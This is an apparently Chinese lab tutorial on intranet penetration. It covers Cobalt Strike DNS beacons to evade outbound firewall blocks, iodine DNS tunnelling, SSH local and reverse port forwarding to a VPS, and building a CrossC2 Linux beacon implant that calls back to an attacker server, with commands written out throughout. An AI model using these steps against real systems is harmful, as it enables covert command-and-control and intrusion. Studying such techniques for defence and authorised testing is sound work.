内网安全-隧道技术&SSH实现通信&DNS上线与通信&CS上线Linux主机

2024-03-01 1100阅读

温馨提示:这篇文章已超过393天没有更新,请注意相关的内容是否还可用!

内网安全-隧道技术&SSH实现通信&DNS上线与通信&CS上线Linux主机

一、DNS隧道技术

DNS简介:DNS协议为应用层协议,区域传输时用tcp协议,域名解析时用udp协议

内网安全-隧道技术&SSH实现通信&DNS上线与通信&CS上线Linux主机

###通过DNS隧道绕过防火墙,实现CS上线

实验背景:靶机防火墙封禁出站TCP协议

1、判断出网协议,若果可以ping通,可以利用ICMP协议隧道(之前文章有利用详情)

2、判断是否可以使用DNS协议搭建隧道:nslookup(nslookup baidu.com)

内网安全-隧道技术&SSH实现通信&DNS上线与通信&CS上线Linux主机

内网安全-隧道技术&SSH实现通信&DNS上线与通信&CS上线Linux主机

3、在自己的域名服务中添加NS记录(将子域名指定其他DNS服务器解析)和A(将一个域名指定为IPV4地址)记录,最好添加两条

www.dafei6.cn 解析结果 8.130.119.xx

ns1.dafei6.cn 解析结果为 www.dafei6.cn

ns2.dafei6.cn 解析结果为 www.dafei6.cn

内网安全-隧道技术&SSH实现通信&DNS上线与通信&CS上线Linux主机

4、VPS防火墙(安全组)开放DUP端口53,

注意:DNS paylod默认使用53端口,所以一定要把vps的53端口kill掉,端口占用是不会上线的。

查看53端口是否占用,lsof -i:53

内网安全-隧道技术&SSH实现通信&DNS上线与通信&CS上线Linux主机

内网安全-隧道技术&SSH实现通信&DNS上线与通信&CS上线Linux主机

5、启动CS,创建DNS Beacon,Payload设置DNS地址为ns1.dafei6.cn、ns2.dafei6.cn,StagerDNS地址设置为www.dafei6.cn,生成后门

内网安全-隧道技术&SSH实现通信&DNS上线与通信&CS上线Linux主机

5、靶机运行木马,CS实现上线,会话交互输入mode dns-txt,即可上线

内网安全-隧道技术&SSH实现通信&DNS上线与通信&CS上线Linux主机

###通过DNS隧道绕过防火墙保持与靶机(内网)的通信

实验背景:靶机防火墙封禁出站TCP协议,获取到执行cmd的权限

实验工具:iodined(https://github.com/yarrick/iodine)

1、在服务器中执行 iodined -f -c -P dafei 192.168.0.1 ns1.dafei6.cn -DD //设置密码dafei并创建虚拟IP及绑定域名指向ns1.dafei6.cn,服务器会新建一个IP为192.168.0.1的网卡

    iodined -f -c -P Micr067 192.168.0.1 vpn.abc.com -DD

    -f:在前台运行

    -c:禁止检查所有传入请求的客户端IP地址。

    -P:客户端和服务端之间用于验证身份的密码。

    -D:指定调试级别,-DD指第二级。“D”的数量随级别增加。

    这里的192.168.0.1是自定义的局域网虚拟IP地址

apt-get update

apt install iodine

内网安全-隧道技术&SSH实现通信&DNS上线与通信&CS上线Linux主机

2、在靶机CMD中执行 iodine.exe -f -M 200 -P dafei ns1.dafei6.cn //靶机会新建一个IP为192.168.0.X/24的C段网卡,实现与服务器的同网段通信

    iodine -f -P Micr067 vpn.abc.ltd -M 200

    -r:iodine有时会自动将DNS隧道切换为UDP隧道,该参数的作用是强制在任何情况下使用DNS隧道

    -M:指定上行主机的大小。

    -m:调节最大下行分片的大小。

    -T:指定DNS请求类型TYPE,可选项有NULL、PRIVATE、TXT、SRV、CNAME、MX、A。

    -O:指定数据编码规范。

    -L:指定是否开启懒惰模式,默认开启。

    -I:指定两个请求之间的时间间隔。

内网安全-隧道技术&SSH实现通信&DNS上线与通信&CS上线Linux主机

内网安全-隧道技术&SSH实现通信&DNS上线与通信&CS上线Linux主机

二、SSH隧道技术(利用SSH协议将同网段的内网主机端口服务转发到远程vps)

内网安全-隧道技术&SSH实现通信&DNS上线与通信&CS上线Linux主机

1、通讯:

由于SSH协议存在于Linux系统,跳板机必须Linux

开启ssh协议登录:

vi /etc/ssh/sshd_config

PermitRootLogin yes

PasswordAuthentication yes

/etc/init.d/ssh start

/etc/init.d/ssh restart

靶机封禁出站,采取正向入站,将内网主机的端口服务封装到本地,实现端口的转发

ssh -CfNg -L 1234:192.168.131.134:80 root@192.168.131.128 //将内网主机192.168.131.134的80端口转发至本地192.168.131.128的8877端口

curl http://127.0.0.1:8877

内网安全-隧道技术&SSH实现通信&DNS上线与通信&CS上线Linux主机

靶机封禁入站,采取反向出站

在跳板机192.168.131.128中输入:ssh -CfNg -R 9988:192.168.131.134:80 root@8.130.119.137 //将内网主机192.168.131.134的80端口转发至8.130.119.137的9988端口

在远程VPS(8.130.119.137)中访问:curl http://127.0.0.1:9988

内网安全-隧道技术&SSH实现通信&DNS上线与通信&CS上线Linux主机

内网安全-隧道技术&SSH实现通信&DNS上线与通信&CS上线Linux主机

三、CS上线linux系统(利用CrossC2.cna)

1、首先下载CrossC2(https://github.com/gloxec/CrossC2)目前版本只支持反向的https和正向的tcp

将对应服务器系统类型的相关插件和文件传入CS根目录,并赋予一定的执行权限

内网安全-隧道技术&SSH实现通信&DNS上线与通信&CS上线Linux主机

内网安全-隧道技术&SSH实现通信&DNS上线与通信&CS上线Linux主机

内网安全-隧道技术&SSH实现通信&DNS上线与通信&CS上线Linux主机

2、新建监听器,生成木马

内网安全-隧道技术&SSH实现通信&DNS上线与通信&CS上线Linux主机

内网安全-隧道技术&SSH实现通信&DNS上线与通信&CS上线Linux主机

3、根据CS的事件日志,生成木马

/root/CS4.5 /genCrossC2.Linux 8.130.119.137 5566 ./.cobaltstrike.beacon_keys null Linux x64 t_cc2.out

内网安全-隧道技术&SSH实现通信&DNS上线与通信&CS上线Linux主机

4、上传木马文件,添加执行权限

内网安全-隧道技术&SSH实现通信&DNS上线与通信&CS上线Linux主机

内网安全-隧道技术&SSH实现通信&DNS上线与通信&CS上线Linux主机

VPS购买请点击我

免责声明:我们致力于保护作者版权,注重分享,被刊用文章因无法核实真实出处,未能及时与作者取得联系,或有版权异议的,请联系管理员,我们会立即处理! 部分文章是来自自研大数据AI进行生成,内容摘自(百度百科,百度知道,头条百科,中国民法典,刑法,牛津词典,新华词典,汉语词典,国家院校,科普平台)等数据,内容仅供学习参考,不准确地方联系删除处理! 图片声明:本站部分配图来自人工智能系统AI生成,觅知网授权图片,PxHere摄影无版权图库和百度,360,搜狗等多加搜索引擎自动关键词搜索配图,如有侵权的图片,请第一时间联系我们,邮箱:ciyunidc@ciyunshuju.com。本站只作为美观性配图使用,无任何非法侵犯第三方意图,一切解释权归图片著作权方,本站不承担任何责任。如有恶意碰瓷者,必当奉陪到底严惩不贷!

相关阅读

目录[+]